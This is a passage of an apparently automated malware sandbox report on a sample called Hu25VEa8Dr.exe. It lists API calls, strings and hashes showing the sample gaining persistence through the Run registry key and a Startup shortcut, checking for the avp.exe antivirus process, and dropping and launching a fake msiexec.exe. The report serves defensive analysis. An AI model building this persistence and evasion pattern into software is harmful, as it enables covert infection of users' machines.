GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 004021B1
??3@YAXPAX@Z.MSVCRT ref: 004021CE

Strings

RtlDecompressBuffer, xrefs: 004021AB
Ntdll.dll, xrefs: 004021A0

Memory Dump Source

Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: ??2@??3@$AddressLibraryLoadProc
String ID: Ntdll.dll$RtlDecompressBuffer
API String ID: 2852400082-662685767
Opcode ID: 7787bc536107e3c50eb459c9c007716404211b6839400d8fdc558572799896aa
Instruction ID: 531a7ec942284e6b34a3e9cc2ffd4a3043220942f7d98ccca6845493d414fb18
Opcode Fuzzy Hash: 7787bc536107e3c50eb459c9c007716404211b6839400d8fdc558572799896aa
Instruction Fuzzy Hash: E901C476900119BFCF049FA4DD4AEDE77B9EF08314F000069FA05B7190D6B56A04CB54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040266C Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32(00000104,00000000), ref: 00402677
PathGetArgsA.SHLWAPI(00000000), ref: 00402680
??2@YAPAXI@Z.MSVCRT ref: 004026A0
??2@YAPAXI@Z.MSVCRT ref: 004026A9
GetEnvironmentVariableA.KERNEL32(00000670,00000000,00000104,?), ref: 004026F1
PathCombineA.SHLWAPI(00000000,00000000,00000064), ref: 0040270B
PathCombineA.SHLWAPI(00000000,00000000,-000005A8), ref: 0040271B
lstrlenA.KERNEL32(00000000), ref: 0040271E
lstrcatA.KERNEL32(j(@,00402134), ref: 00402745
lstrcatA.KERNEL32(?,00000000), ref: 00402754
??3@YAXPAX@Z.MSVCRT ref: 00402759
??3@YAXPAX@Z.MSVCRT ref: 0040275F
lstrcpyA.KERNEL32(j(@,00000000), ref: 0040276C

Strings

j(@, xrefs: 00402769, 00402724, 00402735

Memory Dump Source

Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Path$??2@??3@Combinelstrcat$ArgsCommandEnvironmentLineVariablelstrcpylstrlen
String ID: j(@
API String ID: 1848265983-2441115870
Opcode ID: 3c6b8aff4d8e67542f72917e5a93f8b16faca7c1993018cc778e733412f8d674
Instruction ID: 20b46665c5c392077cfaf8139bb222d8e5b4c3735ced006ec0b8e3afc4d8f7d2
Opcode Fuzzy Hash: 3c6b8aff4d8e67542f72917e5a93f8b16faca7c1993018cc778e733412f8d674
Instruction Fuzzy Hash: A9319032500218AFDF11AF64DD88ADE7BB9EB08354F1040B6F945B72E1DAB95A80CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402520 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 110
registryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000001,00000000), ref: 00402552
GetEnvironmentVariableA.KERNEL32(00402F66,?,00000104), ref: 004025AC
PathCombineA.SHLWAPI(?,?,0040295A), ref: 004025CD
PathCombineA.SHLWAPI(?,?,0040234E), ref: 004025E4
PathUnquoteSpacesA.SHLWAPI(?), ref: 004025F3
CopyFileA.KERNEL32 ref: 00402604
PathQuoteSpacesA.SHLWAPI(?), ref: 00402614
RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00402628
lstrlenA.KERNEL32(?), ref: 00402635
RegSetValueExA.ADVAPI32(00000000,004028F6,00000000,00000001,?,00000000), ref: 0040264C
RegCloseKey.ADVAPI32(00000000), ref: 00402655
PathUnquoteSpacesA.SHLWAPI(?), ref: 00402662

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040261E

Memory Dump Source

Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Path$Spaces$CombineFileUnquote$CloseCopyEnvironmentModuleNameOpenQuoteValueVariablelstrlen
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 2107585506-1428018034
Opcode ID: 83fca13ebf4ad39da448c043303d9b21502982656c2de3e17278bbeabd522527
Instruction ID: a86aad1d29e7a7895c0fb444d9a4815063da67e6701978e6f822172513d27bf4
Opcode Fuzzy Hash: 83fca13ebf4ad39da448c043303d9b21502982656c2de3e17278bbeabd522527
Instruction Fuzzy Hash: 80311DB690425CBFDB11DBA4DD44ACABB7CAB48344F1044B6E689F2150DA709BC88FA4

Uniqueness

Uniqueness Score: -1.00%

Function 004021DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathCombineA.SHLWAPI(?,00000000,00000000), ref: 0040220F
SetFileAttributesA.KERNEL32(?,00000080), ref: 00402228
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040223C
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040225E
CloseHandle.KERNEL32(?), ref: 00402267
SetFileAttributesA.KERNEL32(?,00000080), ref: 00402275
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,?), ref: 0040228B

Strings

open, xrefs: 00402285

Memory Dump Source

Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: File$Attributes$CloseCombineCreateExecuteHandlePathShellWrite
String ID: open
API String ID: 1472231245-2758837156
Opcode ID: f51bcf8fff26897ea240e9d3aae106b4200d1664d093c1129e96391cb81a67ab
Instruction ID: b8440b774cbbe2fa9ab760de7017495f46494a0c5c1a7f4db0f29674fa40f498
Opcode Fuzzy Hash: f51bcf8fff26897ea240e9d3aae106b4200d1664d093c1129e96391cb81a67ab
Instruction Fuzzy Hash: 3E119AB580025CBBDF209FA4DD88EDB3F7DEB08390F1045A5B619A20A1D6309A848FA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Hu25VEa8Dr.exePID: 2092, Parent PID: 1724COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.2%
Total number of Nodes:	1002
Total number of Limit Nodes:	25

Executed Functions

Function 004014F0 Relevance: 79.1, APIs: 33, Strings: 12, Instructions: 321
filesynchronizationprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: GetVersionExW.KERNEL32(?), ref: 00401030
Part of subcall function 00401000: GetCurrentProcess.KERNEL32(00020008,?), ref: 0040104B
Part of subcall function 00401000: OpenProcessToken.ADVAPI32(00000000), ref: 00401052
Part of subcall function 00401000: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00401075

_memset.LIBCMT ref: 00401527
_memset.LIBCMT ref: 00401542
_memset.LIBCMT ref: 0040155D
_memset.LIBCMT ref: 00401578
_memset.LIBCMT ref: 00401594
GetTickCount.KERNEL32 ref: 0040159C

Part of subcall function 00401A4B: __getptd.LIBCMT ref: 00401A50

OpenMutexW.KERNEL32(001F0001,00000000,TLS), ref: 004015B6
_memset.LIBCMT ref: 004015D0
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040161B
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040162F
Process32NextW.KERNEL32(00000000,0000022C), ref: 00401647
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040169B
GetTempPathW.KERNEL32(00000104,?), ref: 004016AD
CreateDirectoryW.KERNEL32(?,00000000), ref: 004016F1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401726
WriteFile.KERNEL32(00000000,00409B10,00015891,?,00000000), ref: 00401741
CloseHandle.KERNEL32(00000000), ref: 00401748
ShellExecuteExW.SHELL32(0000003C), ref: 00401766
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000208), ref: 0040179A
CreateDirectoryW.KERNEL32(?,00000000), ref: 004017DF
CreateDirectoryW.KERNEL32(?,00000000), ref: 00401802
ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%,?,00000208), ref: 00401812
GetTempPathW.KERNEL32(00000104,?), ref: 00401824
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004018E9
WriteFile.KERNEL32(00000000,00409B10,00015891,?,00000000), ref: 00401904
CloseHandle.KERNEL32(00000000), ref: 0040190B
ShellExecuteExW.SHELL32(0000003C), ref: 00401929
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040193E
FindFirstChangeNotificationW.KERNEL32(?,00000000,00000001), ref: 0040194A
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00401958
FindNextChangeNotification.KERNEL32(00000000), ref: 0040195B
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00401967
GetFileAttributesW.KERNEL32(?), ref: 00401970

Strings

\StArt menu\PROGraMs\StaRtup\(empty).lnk, xrefs: 004018BA
\Local Settings, xrefs: 004017B8
avp.exe, xrefs: 00401650
\MSI, xrefs: 004016D0
.exe, xrefs: 0040188C
TLS, xrefs: 004015AB
%ALLUSERSPROFILE%, xrefs: 00401795
<, xrefs: 004015DB
@, xrefs: 004015E5
\msiexec.exe, xrefs: 004016F7
\Temp, xrefs: 004017E1
%USERPROFILE%, xrefs: 0040180D

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Create_memset$File$DirectoryNextObjectProcess32SingleWait$ChangeCloseEnvironmentExecuteExpandFindFirstHandleNotificationOpenPathProcessShellStringsTempTokenWrite$AttributesCountCurrentInformationMutexSnapshotTickToolhelp32Version__getptd
String ID: %ALLUSERSPROFILE%$%USERPROFILE%$.exe$<$@$TLS$\Local Settings$\MSI$\StArt menu\PROGraMs\StaRtup\(empty).lnk$\Temp$\msiexec.exe$avp.exe
API String ID: 2551661832-1653471747
Opcode ID: 69dfa76764e60a3861e15c6053272fee807c10cbfec4bdac134e18a40d4089da
Instruction ID: fc4d4cc7c3a3f39693fa932c2efe313973c120b32c5f279216d8c7e13d690431
Opcode Fuzzy Hash: 69dfa76764e60a3861e15c6053272fee807c10cbfec4bdac134e18a40d4089da
Instruction Fuzzy Hash: B1B167F19402186BE720EBA0CC85FDA737CAF44704F4086BAB605B61D1EB795F948F69

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 10.6, APIs: 7, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00401030
GetCurrentProcess.KERNEL32(00020008,?), ref: 0040104B
OpenProcessToken.ADVAPI32(00000000), ref: 00401052
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00401075
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004010C4
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004010DD
FreeSid.ADVAPI32(?), ref: 004010F4

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Token$Process$AllocateCheckCurrentFreeInformationInitializeMembershipOpenVersion
String ID:
API String ID: 2144733581-0
Opcode ID: bc5e636e3f20792d39db81558b6a1c48cad66fec7b540f6e23d222dc24549440
Instruction ID: 42bc32eec1429b5371f9bf7f58ed946eeadebff489582c99215efa076821d9f3
Opcode Fuzzy Hash: bc5e636e3f20792d39db81558b6a1c48cad66fec7b540f6e23d222dc24549440
Instruction Fuzzy Hash: 8D316171A00208AFDB10DFA1DD85BFEB3B8EB48305F0045EEA64AA6190DA349E94CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00401290 Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 183
registryfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: GetVersionExW.KERNEL32(?), ref: 00401030
Part of subcall function 00401000: GetCurrentProcess.KERNEL32(00020008,?), ref: 0040104B
Part of subcall function 00401000: OpenProcessToken.ADVAPI32(00000000), ref: 00401052
Part of subcall function 00401000: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00401075

RegOpenKeyExW.KERNEL32 ref: 004012E5
RegCloseKey.ADVAPI32(?), ref: 004012F2
RegSetValueExW.KERNEL32 ref: 00401321
RegCloseKey.ADVAPI32(?), ref: 0040132E
RegOpenKeyExW.KERNEL32 ref: 0040134C
_memset.LIBCMT ref: 0040136A
_memset.LIBCMT ref: 00401385
_memset.LIBCMT ref: 004013A0
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004013B6
GetTempPathW.KERNEL32(00000104,?), ref: 004013C8
GetTempFileNameW.KERNEL32(?,0040792C,00000000,?), ref: 00401401
CopyFileW.KERNEL32 ref: 00401417
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00401433
GetFileSize.KERNEL32(00000000,00000000), ref: 00401448
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 0040145A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040146E
_rand.LIBCMT ref: 00401474
RegSetValueExW.KERNEL32 ref: 004014AA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004014B8
CloseHandle.KERNEL32(00000000), ref: 004014BF
RegCloseKey.ADVAPI32(?), ref: 004014CC
DeleteFileW.KERNEL32(?), ref: 004014D9

Strings

SOFTWARE, xrefs: 00401342
ImageBase, xrefs: 004014A4
SOFTWARE\Microsoft, xrefs: 004012C1, 004012DB
00E35EEE, xrefs: 0040131B

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: File$Close$Open_memset$NameProcessTempTokenValueVirtual$AllocCopyCreateCurrentDeleteFreeHandleInformationModulePathReadSizeVersion_rand
String ID: 00E35EEE$ImageBase$SOFTWARE$SOFTWARE\Microsoft
API String ID: 693823151-2382807074
Opcode ID: 158df57d4165a7c83e994cac4dba8edfbe2c1434f91deed46b9baa4026a3f672
Instruction ID: a240fd00b0f685ef9ea725f7c0a7f4e5701b82f883001beb35e5e8632b8dc4d9
Opcode Fuzzy Hash: 158df57d4165a7c83e994cac4dba8edfbe2c1434f91deed46b9baa4026a3f672
Instruction Fuzzy Hash: B051EBB1A80314BBE720DBA0DD4AFEA777DDF88704F1041B9B706B60D1D6B599508B6C

Uniqueness

Uniqueness Score: -1.00%

Function 004024F9 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 00402501

Part of subcall function 004024CE: GetModuleHandleW.KERNEL32(mscoree.dll,?,00402506,00000000,?,0040583D,000000FF,0000001E,00000001,00000000,00000000,?,00404126,00000000,00000001,00000000), ref: 004024D8
Part of subcall function 004024CE: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00402506,00000000,?,0040583D,000000FF,0000001E,00000001,00000000,00000000,?,00404126,00000000,00000001), ref: 004024E8

ExitProcess.KERNEL32 ref: 0040250A

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 3c09b3463ed0e938e77df1f2eec3b316edc29e9afb0af13200940fbb9fed6152
Instruction ID: 55b3fd13d3930410ec0bd6ff67a48b9961f98913516eb3735291f5509673ab2b
Opcode Fuzzy Hash: 3c09b3463ed0e938e77df1f2eec3b316edc29e9afb0af13200940fbb9fed6152
Instruction Fuzzy Hash: D0B09B3100010CBBDB012F16DD0E8493F15DB40350711C035F40915471DF729D519594

Uniqueness

Uniqueness Score: -1.00%

Function 00401DEE Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000008,?,004019C2,?,?,00000000,00000008,?,?,00401234,00000009,00000002), ref: 00401E31

Part of subcall function 00401DDB: __getptd_noexit.LIBCMT ref: 00401DDB

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: db9f48bcfdcd952d97516c4ad9846fc9f16d01eead63be7037a183a728ba2e56
Instruction ID: 56100bd5126312914a4cf2e54b5d4e9fc684f082ec158ef11dbc597ada45c8a9
Opcode Fuzzy Hash: db9f48bcfdcd952d97516c4ad9846fc9f16d01eead63be7037a183a728ba2e56
Instruction Fuzzy Hash: 3D01B1313012159BEB289F76DC54B6F3758AF817A0F01453BEC16AB2F0D73898018798

Uniqueness

Uniqueness Score: -1.00%

Function 00402751 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 0040275D

Part of subcall function 00402611: __lock.LIBCMT ref: 0040261F
Part of subcall function 00402611: RtlDecodePointer.NTDLL(00407B90,00000020,00402778,00000000,00000001,00000000,?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 0040265B
Part of subcall function 00402611: DecodePointer.KERNEL32(?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 0040266C
Part of subcall function 00402611: DecodePointer.KERNEL32(-00000004,?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 00402692
Part of subcall function 00402611: DecodePointer.KERNEL32(?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 004026A5
Part of subcall function 00402611: DecodePointer.KERNEL32(?,004027B8,000000FF,?,0040362B,00000011,?,?,004020D7,0000000D), ref: 004026AF

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: DecodePointer$__lock_doexit
String ID:
API String ID: 3343572566-0
Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction ID: 2835470756025a3359128ba12a19751557f739aa17dcde0f0a27c1decc4f0477
Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction Fuzzy Hash: BBB0923258020833DA202542AC0BF063A0987C1B64E680061BA0C291E1A9A3B9618089

Uniqueness

Uniqueness Score: -1.00%

Function 0040200A Relevance: 1.5, APIs: 1, Instructions: 3
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000,004047C1,00426880,00000314,00000000,?,?,?,?,?,0040291C,00426880,Microsoft Visual C++ Runtime Library,00012010), ref: 0040200C

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: f13c84878780a0640bfe0c7d6e936be8079c7ea07e2e3e3b0fcd0b513671049b
Instruction ID: 4816118a2607bd65971d862af3c7b0bfd17682bfab921533bb1fce046072eb2b
Opcode Fuzzy Hash: f13c84878780a0640bfe0c7d6e936be8079c7ea07e2e3e3b0fcd0b513671049b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401999 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00401D4E
SetUnhandledExceptionFilter.KERNEL32 ref: 00401D63
UnhandledExceptionFilter.KERNEL32(004061EC), ref: 00401D6E
GetCurrentProcess.KERNEL32(C0000409), ref: 00401D8A
TerminateProcess.KERNEL32(00000000), ref: 00401D91

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 81cb7dbcff39d8609ecacbd0f084c8f9c29420ea19ee6c4832bb0335e36c9e6f
Instruction ID: b169cc00e7c4ed4ce90c2bd3d00b4e4eba92b37a002916addad9849010ed146c
Opcode Fuzzy Hash: 81cb7dbcff39d8609ecacbd0f084c8f9c29420ea19ee6c4832bb0335e36c9e6f
Instruction Fuzzy Hash: 072123B4A11204EFD720DF24FE446043BB4BB08314F82407AE909A33B5EBB55A86CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401220 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 0040122F

Strings

abcdefghijklmnopqrstuvxyz, xrefs: 00401243, 0040126D

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: _calloc
String ID: abcdefghijklmnopqrstuvxyz
API String ID: 1679841372-3395597499
Opcode ID: 3b99a827032a1efea53796c2415dfc32b5755cb1f5537b45daff8ea78a204b4c
Instruction ID: b11a14f750e411699c7cda967f5c8f1b4767afd2ccc79c3245f504d447faffa6
Opcode Fuzzy Hash: 3b99a827032a1efea53796c2415dfc32b5755cb1f5537b45daff8ea78a204b4c
Instruction Fuzzy Hash: 6EF0C836F0011557C720975DEC0179A3399DBC4361F4541BBED48D7350EA759E1582D9

Uniqueness

Uniqueness Score: -1.00%

Function 00402303 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00401BA6), ref: 0040230B
__mtterm.LIBCMT ref: 00402317

Part of subcall function 00402050: DecodePointer.KERNEL32(00000003,00402479,?,00401BA6), ref: 00402061
Part of subcall function 00402050: TlsFree.KERNEL32(00000015,00402479,?,00401BA6), ref: 0040207B
Part of subcall function 00402050: DeleteCriticalSection.KERNEL32(00000000,00000000,774EB15F,?,00402479,?,00401BA6), ref: 004034F1
Part of subcall function 00402050: _free.LIBCMT ref: 004034F4
Part of subcall function 00402050: DeleteCriticalSection.KERNEL32(00000015,774EB15F,?,00402479,?,00401BA6), ref: 0040351B

GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00401BA6), ref: 0040232D
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00401BA6), ref: 0040233A
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00401BA6), ref: 00402347
GetProcAddress.KERNEL32(00000000,FlsFree,?,00401BA6), ref: 00402354
TlsAlloc.KERNEL32(?,00401BA6), ref: 004023A4
TlsSetValue.KERNEL32(00000000,?,00401BA6), ref: 004023BF
__init_pointers.LIBCMT ref: 004023C9
EncodePointer.KERNEL32(?,00401BA6), ref: 004023DA
EncodePointer.KERNEL32(?,00401BA6), ref: 004023E7
EncodePointer.KERNEL32(?,00401BA6), ref: 004023F4
EncodePointer.KERNEL32(?,00401BA6), ref: 00402401
DecodePointer.KERNEL32(004021D4,?,00401BA6), ref: 00402422
__calloc_crt.LIBCMT ref: 00402437
DecodePointer.KERNEL32(00000000,?,00401BA6), ref: 00402451
GetCurrentThreadId.KERNEL32(?,00401BA6), ref: 00402463

Strings

KERNEL32.DLL, xrefs: 00402306
FlsSetValue, xrefs: 0040233C
FlsFree, xrefs: 00402349
FlsGetValue, xrefs: 0040232F
FlsAlloc, xrefs: 00402327

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 6864959bad21f16efcd608d5513ee2a71937084775e2493dc546c8a40c0c37da
Instruction ID: dc2f2d14b3d5f79f5eea71b86655991f8044967a8e8a5a9da60b5ef0e6218753
Opcode Fuzzy Hash: 6864959bad21f16efcd608d5513ee2a71937084775e2493dc546c8a40c0c37da
Instruction Fuzzy Hash: 11317071A41311ABC731BF79AE0CA167AE4EB44360756063BE915B62F0DBB88462CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401110 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00401118
CoCreateInstance.OLE32(004061CC,00000000,00000001,004061BC,?), ref: 00401138
CoUninitialize.OLE32 ref: 004011E3
CoUninitialize.OLE32 ref: 00401211

Strings

C:\, xrefs: 00401168
shell32.dll, xrefs: 00401194

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID: C:\$shell32.dll
API String ID: 1968832861-1586883061
Opcode ID: f8298a3f2e42d5c23b232cde7a4a42f278af90a4b026be23ee81adac31167ce6
Instruction ID: 1f0791a87f4a97ea7e528ad9acff92eae43fbf075af62516d5be8bbe8364a1ed
Opcode Fuzzy Hash: f8298a3f2e42d5c23b232cde7a4a42f278af90a4b026be23ee81adac31167ce6
Instruction Fuzzy Hash: 5441EB34700604AFC700EBA4CD85F5AB7B9AF8D704F218594E609EB3A1DA75ED02DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040208D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00407B40,00000008,00402195,00000000,00000000,?,00000008,00401DE0,00401E0B,?,004019C2,?,?,00000000,00000008), ref: 0040209E
__lock.LIBCMT ref: 004020D2

Part of subcall function 00403604: __mtinitlocknum.LIBCMT ref: 0040361A
Part of subcall function 00403604: __amsg_exit.LIBCMT ref: 00403626
Part of subcall function 00403604: EnterCriticalSection.KERNEL32(?,?,?,004020D7,0000000D), ref: 0040362E

InterlockedIncrement.KERNEL32(00409540), ref: 004020DF
__lock.LIBCMT ref: 004020F3
___addlocaleref.LIBCMT ref: 00402111

Strings

KERNEL32.DLL, xrefs: 00402099

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 940bf6df545ee205c965a4f6310594f5e4803979cf951170b273b84f29b5696c
Instruction ID: a693a190344d3e7315565d47fceabcf9e7fcc4da82ce88568d0924fc5f8a8f6b
Opcode Fuzzy Hash: 940bf6df545ee205c965a4f6310594f5e4803979cf951170b273b84f29b5696c
Instruction Fuzzy Hash: DE01A171444700AAD320AF67C90670AFBE0AF04329F10892FE596763E1CBB8A644CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 00403B93 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00403B9F

Part of subcall function 004021BA: __getptd_noexit.LIBCMT ref: 004021BD
Part of subcall function 004021BA: __amsg_exit.LIBCMT ref: 004021CA

